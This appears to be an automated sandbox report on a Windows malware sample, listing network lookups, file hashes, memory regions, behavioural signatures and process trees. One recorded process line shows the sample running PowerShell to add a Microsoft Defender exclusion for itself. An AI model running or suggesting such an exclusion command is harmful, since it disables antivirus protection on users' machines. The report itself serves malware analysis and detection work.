| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | comercializadoradeinsumos.cl | udp |
| US | 162.240.106.189:443 | comercializadoradeinsumos.cl | tcp |
| US | 8.8.8.8:53 | 189.106.240.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Windows\Resources\primy.ini
| MD5 | 76d9175a3db7407eb0bfc3c07ddcd9d2 |
| SHA1 | 72071127e9a44935cb02650ed715ccaf6a8f8418 |
| SHA256 | 1f7119996dd17af05bf05e497104715bbbc3909676afa4329fbd59502be1a1a5 |
| SHA512 | 5032dab71e70a4bd1dad2f5cf9380e0097be7993bc46886fed6e4bdd8781f2b10d31338d90d0dc5804665bda2cbfe93f1172250e1a8ab7c9118baf9f156e3c69 |
C:\Users\Admin\AppData\Local\Temp\nsi739B.tmp\System.dll
| MD5 | 192639861e3dc2dc5c08bb8f8c7260d5 |
| SHA1 | 58d30e460609e22fa0098bc27d928b689ef9af78 |
| SHA256 | 23d618a0293c78ce00f7c6e6dd8b8923621da7dd1f63a070163ef4c0ec3033d6 |
| SHA512 | 6e573d8b2ef6ed719e271fd0b2fd9cd451f61fc9a9459330108d6d7a65a0f64016303318cad787aa1d5334ba670d8f1c7c13074e1be550b4a316963ecc465cdc |
memory/896-23237-0x0000000003830000-0x00000000045E5000-memory.dmp
memory/896-23238-0x00000000771A1000-0x00000000772C1000-memory.dmp
memory/896-23239-0x0000000073E45000-0x0000000073E46000-memory.dmp
memory/896-23240-0x0000000003830000-0x00000000045E5000-memory.dmp
memory/2988-23241-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23242-0x0000000001660000-0x0000000002415000-memory.dmp
memory/2988-23243-0x0000000077228000-0x0000000077229000-memory.dmp
memory/2988-23244-0x0000000077245000-0x0000000077246000-memory.dmp
memory/2988-23248-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23249-0x0000000000401000-0x0000000000404000-memory.dmp
memory/2988-23250-0x0000000001660000-0x0000000002415000-memory.dmp
memory/2988-23252-0x00000000771A1000-0x00000000772C1000-memory.dmp
memory/2988-23251-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23253-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23254-0x0000000000401000-0x0000000000404000-memory.dmp
memory/2988-23255-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23256-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23257-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23261-0x0000000000400000-0x0000000001653000-memory.dmp
memory/2988-23262-0x0000000000401000-0x0000000000404000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
98s
Max time network
145s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1040 set thread context of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe
"C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe"
C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe
"C:\Users\Admin\AppData\Local\Temp\240827 YONG SHUN - GMDSS.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/1040-0-0x00000000752CE000-0x00000000752CF000-memory.dmp
memory/1040-1-0x0000000000830000-0x00000000008EA000-memory.dmp
memory/1040-2-0x0000000005900000-0x0000000005EA6000-memory.dmp
memory/1040-3-0x0000000005350000-0x00000000053E2000-memory.dmp
memory/1040-4-0x00000000053F0000-0x0000000005747000-memory.dmp
memory/1040-5-0x00000000752C0000-0x0000000075A71000-memory.dmp
memory/1040-6-0x0000000005310000-0x000000000531A000-memory.dmp
memory/1040-7-0x0000000005850000-0x00000000058EC000-memory.dmp
memory/1040-8-0x0000000005820000-0x000000000583C000-memory.dmp
memory/1040-9-0x00000000752CE000-0x00000000752CF000-memory.dmp
memory/1040-10-0x00000000752C0000-0x0000000075A71000-memory.dmp
memory/1040-11-0x0000000007B50000-0x0000000007BDE000-memory.dmp
memory/2916-12-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2916-14-0x0000000000400000-0x0000000000447000-memory.dmp
memory/1040-15-0x00000000752C0000-0x0000000075A71000-memory.dmp
memory/4480-16-0x000000007534E000-0x000000007534F000-memory.dmp
memory/4480-18-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/4480-17-0x0000000002420000-0x0000000002456000-memory.dmp
memory/4480-20-0x00000000051C0000-0x000000000588A000-memory.dmp
memory/4480-19-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/4480-21-0x0000000004D80000-0x0000000004DA2000-memory.dmp
memory/4480-23-0x00000000050C0000-0x0000000005126000-memory.dmp
memory/4480-22-0x0000000004F20000-0x0000000004F86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3wqjvvf1.dsh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4480-33-0x0000000005990000-0x0000000005CE7000-memory.dmp
memory/4480-34-0x0000000005DC0000-0x0000000005DDE000-memory.dmp
memory/4480-35-0x0000000005E00000-0x0000000005E4C000-memory.dmp
memory/4480-36-0x0000000006D90000-0x0000000006DC2000-memory.dmp
memory/4480-37-0x0000000071520000-0x000000007156C000-memory.dmp
memory/4480-48-0x0000000006FD0000-0x0000000006FEE000-memory.dmp
memory/4480-47-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/4480-49-0x0000000006FF0000-0x0000000007093000-memory.dmp
memory/4480-50-0x0000000007770000-0x0000000007DEA000-memory.dmp
memory/4480-51-0x0000000007120000-0x000000000713A000-memory.dmp
memory/4480-52-0x0000000007190000-0x000000000719A000-memory.dmp
memory/4480-53-0x0000000007390000-0x0000000007426000-memory.dmp
memory/4480-56-0x0000000075340000-0x0000000075AF1000-memory.dmp
memory/2916-57-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2916-58-0x00000000011E0000-0x000000000152C000-memory.dmp
memory/2916-59-0x0000000000400000-0x0000000000447000-memory.dmp